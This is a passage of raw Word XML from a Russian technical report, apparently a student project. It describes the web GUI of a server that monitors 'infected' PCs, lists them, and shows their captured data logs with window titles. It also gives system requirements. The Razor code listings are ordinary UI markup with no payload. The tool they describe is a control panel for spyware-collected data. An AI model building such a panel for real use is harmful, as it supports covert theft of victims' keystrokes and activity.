    <w:p w:rsidR="00D43841" w:rsidRPr="00D43841" w:rsidRDefault="00D43841" w:rsidP="00D43841">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc4724265"/>
      <w:r>
        <w:t xml:space="preserve">Реализация </w:t>
      </w:r>
      <w:r w:rsidRPr="00D43841">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> серверного приложения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00910C11" w:rsidRDefault="007E7CF3" w:rsidP="00754E78">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="007E7CF3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">серверного приложения предназначено для мониторинга активности зараженных ЭВМ и анализа поступивших данных. </w:t>
      </w:r>
      <w:r w:rsidR="00543524">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidR="00543524">
        <w:t xml:space="preserve"> разработано при помощи </w:t>
      </w:r>
      <w:r w:rsidR="00543524">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Razor</w:t>
      </w:r>
      <w:r w:rsidR="00543524" w:rsidRPr="00F02388">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00543524">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidR="00543524" w:rsidRPr="00F02388">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidR="00F02388" w:rsidRPr="00F02388">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F02388">
        <w:t xml:space="preserve">содержит </w:t>
      </w:r>
      <w:r w:rsidR="002024A1">
        <w:t xml:space="preserve">блок меню, блок поиска и блок вывода данных. Блок меню состоит из: ссылки на домашнюю страницу, ссылки на документацию по предоставляемому </w:t>
      </w:r>
      <w:r w:rsidR="002024A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="002024A1" w:rsidRPr="002024A1">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002024A1">
        <w:t xml:space="preserve"> ссылки на список всех зараженных ПК, находящихс</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:t xml:space="preserve">я в базе приложения </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– л</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:t>истинг 15</w:t>
      </w:r>
      <w:r w:rsidR="002024A1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002024A1" w:rsidRPr="002024A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002024A1" w:rsidRPr="002024A1" w:rsidRDefault="002024A1" w:rsidP="002024A1">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002024A1" w:rsidRPr="00754E78" w:rsidRDefault="002024A1" w:rsidP="00D41339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754E78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>&lt;div class="container"&gt;   &lt;ul class="nav navbar-nav"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002024A1" w:rsidRPr="002024A1" w:rsidRDefault="002024A1" w:rsidP="002024A1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2024A1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&lt;li&gt;@Html.ActionLink("</w:t>
      </w:r>
      <w:r w:rsidRPr="002024A1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>Домашняя</w:t>
      </w:r>
      <w:r w:rsidRPr="002024A1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</w:t>
      </w:r>
      <w:r w:rsidRPr="002024A1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>страница</w:t>
      </w:r>
      <w:r w:rsidRPr="002024A1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>", "Index", "Home", new { area = "" }, null)&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002024A1" w:rsidRPr="002024A1" w:rsidRDefault="002024A1" w:rsidP="002024A1">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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2024A1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&lt;li&gt;@Html.ActionLink("API", "Index", "Help", new { area = "" }, null)&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002024A1" w:rsidRPr="00754E78" w:rsidRDefault="002024A1" w:rsidP="00140EC4">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00754E78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&lt;li&gt;@Html.ActionLink("</w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>Список</w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78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</w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>зараженных</w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78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>", "Index", "InfectedList", new { area = "" }, null)&lt;/li&gt;   &lt;/ul&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA7D67" w:rsidRPr="00F02388" w:rsidRDefault="00EA7D67" w:rsidP="00910C11">
      <w:r>
        <w:t xml:space="preserve">Блок поиска состоит из: строки поиска и кнопки вызывающей событие поиска. Поиск осуществляется по имени зараженного ПК или по заглавию </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>сайта в зависимости от открытой страницы приложения: список зараженных ПК или</w:t>
      </w:r>
      <w:r w:rsidR="00D73FB0">
        <w:t xml:space="preserve"> страница зараженного ПК</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– л</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:t>истинг 16</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002024A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA7D67" w:rsidRPr="00EA7D67" w:rsidRDefault="00EA7D67" w:rsidP="00EA7D67">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA7D67">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73FB0" w:rsidRPr="00D73FB0" w:rsidRDefault="00D73FB0" w:rsidP="00D73FB0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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D73FB0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>&lt;div class="container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73FB0" w:rsidRPr="00D73FB0" w:rsidRDefault="00D73FB0" w:rsidP="00D73FB0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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D73FB0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>@using (Ajax.BeginForm("Search", "InfectedList", new AjaxOptions { }))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73FB0" w:rsidRPr="00D73FB0" w:rsidRDefault="00D73FB0" w:rsidP="00D73FB0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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D73FB0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73FB0" w:rsidRPr="00D73FB0" w:rsidRDefault="00D73FB0" w:rsidP="00D73FB0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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D73FB0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&lt;input type="text" name="name" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73FB0" w:rsidRPr="00D73FB0" w:rsidRDefault="00D73FB0" w:rsidP="00D73FB0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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D73FB0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&lt;input type="submit" value="</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73FB0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>Поиск</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73FB0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>" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73FB0" w:rsidRPr="00D73FB0" w:rsidRDefault="00D73FB0" w:rsidP="00D73FB0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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D73FB0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA7D67" w:rsidRPr="00A46E7A" w:rsidRDefault="00D73FB0" w:rsidP="00D73FB0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D73FB0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00A46E7A" w:rsidRDefault="00A46E7A" w:rsidP="00D73FB0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00A46E7A" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46E7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;div class="container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00754E78" w:rsidRDefault="00A46E7A" w:rsidP="00A10492">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46E7A">
        <w:t xml:space="preserve">    @using (Ajax.BeginForm("Search", "InfectedItem", new AjaxOptions { }))   </w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00A46E7A" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00754E78">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46E7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;h5&gt;Поиск по Title окна: &lt;/h5&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00A46E7A" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46E7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00A46E7A">
        <w:t>&lt;input type="text" name="name" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00754E78" w:rsidRDefault="00A46E7A" w:rsidP="003F4BE0">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46E7A">
        <w:t xml:space="preserve">        &lt;input type="submit" value="</w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Поиск</w:t>
      </w:r>
      <w:r w:rsidRPr="00A46E7A">
        <w:t xml:space="preserve">" /&gt;    </w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="002024A1" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46E7A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA7D67" w:rsidRPr="00F02388" w:rsidRDefault="00EA7D67" w:rsidP="00EA7D67">
      <w:r>
        <w:t xml:space="preserve">Блок </w:t>
      </w:r>
      <w:r w:rsidR="00A46E7A">
        <w:t>вывода данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00A46E7A">
        <w:t>контейнера отображающий все</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A46E7A">
        <w:t xml:space="preserve">данные для ПК или данные поступающие со всех зараженных ПК обновляясь в реальном времени </w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– л</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:t>истинг 17</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002024A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA7D67" w:rsidRPr="002024A1" w:rsidRDefault="00EA7D67" w:rsidP="00EA7D67">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00910C11">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00A46E7A" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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A46E7A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>&lt;div class="jumbotron" style="height:380px; width:auto; overflow:auto; text-wrap:normal;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00754E78" w:rsidRDefault="00A46E7A" w:rsidP="00306F1B">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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754E78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</w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>@if (Model.Count() &gt; 0)    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00A46E7A" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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A46E7A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&lt;ul style="list-style: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00754E78" w:rsidRDefault="00A46E7A" w:rsidP="00290AF5">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36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754E78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@foreach (var log in Model)            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00754E78" w:rsidRDefault="00A46E7A" w:rsidP="008375ED">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr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754E78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        &lt;li&gt;@string.Format("{0} - {2}: {1}", log.Date, log.Data, log.WindowHandleer)&lt;/li&gt;            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00754E78" w:rsidRDefault="00A46E7A" w:rsidP="00850067">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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754E78">
        <w:rPr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    </w:t>
      </w:r>
      <w:r w:rsidRPr="00754E78">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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>&lt;/ul&gt;    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00A46E7A" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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A46E7A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A46E7A" w:rsidRPr="00A46E7A" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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</w:pPr>
      <w:r w:rsidRPr="00A46E7A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU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 xml:space="preserve">    {@("Для данного ПК нет записей лога")}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA7D67" w:rsidRPr="002024A1" w:rsidRDefault="00A46E7A" w:rsidP="00A46E7A">
      <w:pPr>
        <w:pStyle w:val="a1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46E7A">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="ru-RU"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1">
                <w14:lumMod w14:val="75000"/>
                <w14:lumMod w14:val="75000"/>
                <w14:lumOff w14:val="0"/>
              </w14:schemeClr>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B4C63" w:rsidRDefault="00EA7D67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7F073E" w:rsidRDefault="007F073E" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="10"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc4724266"/>
      <w:r w:rsidRPr="007F073E">
        <w:lastRenderedPageBreak/>
        <w:t>Технологическая часть</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="004D61C0" w:rsidRDefault="004D61C0" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc514159720"/>
      <w:bookmarkStart w:id="29" w:name="_Toc4724267"/>
      <w:r>
        <w:t>Технические требования</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="004D61C0" w:rsidRPr="00B31136" w:rsidRDefault="004D61C0" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B31136">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Минимальные требования</w:t>
      </w:r>
      <w:r w:rsidR="00401C25">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> к аппаратному обеспечению</w:t>
      </w:r>
      <w:r w:rsidRPr="00B31136">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F21F2">
        <w:t>Процессор с тактовой частотой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 ГГц</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF1807">
        <w:t>Оперативная память</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F21F2">
        <w:t xml:space="preserve">1 ГБ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для 32-разрядных систем</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F21F2">
        <w:t xml:space="preserve">2 ГБ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– для 64-разрядных систем</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7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Место на жестком диске</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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16 Гб – для 32-разрядных систем</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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20 Гб – для 64-разрядных систем</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00ED6F1F">
      <w:r>
        <w:t xml:space="preserve">Системные требования выбраны в соответствии с минимальной поддерживаемой ОС </w:t>
      </w:r>
      <w:r w:rsidRPr="00B31136">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="008F21F2">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7ACA" w:rsidRDefault="002E7ACA" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="a7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617BF9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ля работы клиентского приложения необходимо подключение к сети, в которой находится сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401C25" w:rsidRDefault="00401C25" w:rsidP="00ED6F1F">
      <w:r>
        <w:t xml:space="preserve">Минимальные требования к программному </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>обеспечению</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00460420" w:rsidRDefault="007962C1" w:rsidP="00543524">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>.NET Framework 4.</w:t>
      </w:r>
      <w:r w:rsidR="00923C42">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00401C25">
        <w:t xml:space="preserve"> или более поздняя версия</w:t>
      </w:r>
      <w:r w:rsidR="002E7ACA">
        <w:t xml:space="preserve"> для работы клиентского приложения.</w:t>
      </w:r>
      <w:r w:rsidR="00923C42" w:rsidRPr="004D61C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F073E" w:rsidRDefault="007F073E" w:rsidP="00ED6F1F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc4724268"/>
      <w:r>
        <w:t>Руководство администратора</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w:rsidR="00460420" w:rsidRPr="00460420" w:rsidRDefault="00460420" w:rsidP="00460420">
      <w:r>
        <w:t>Установки приложения в системе:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D455ED" w:rsidRDefault="00D455ED" w:rsidP="00CF09AF">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Установ</w:t>
      </w:r>
      <w:r w:rsidR="003017F3">
        <w:t>ка</w:t>
      </w:r>
      <w:r>
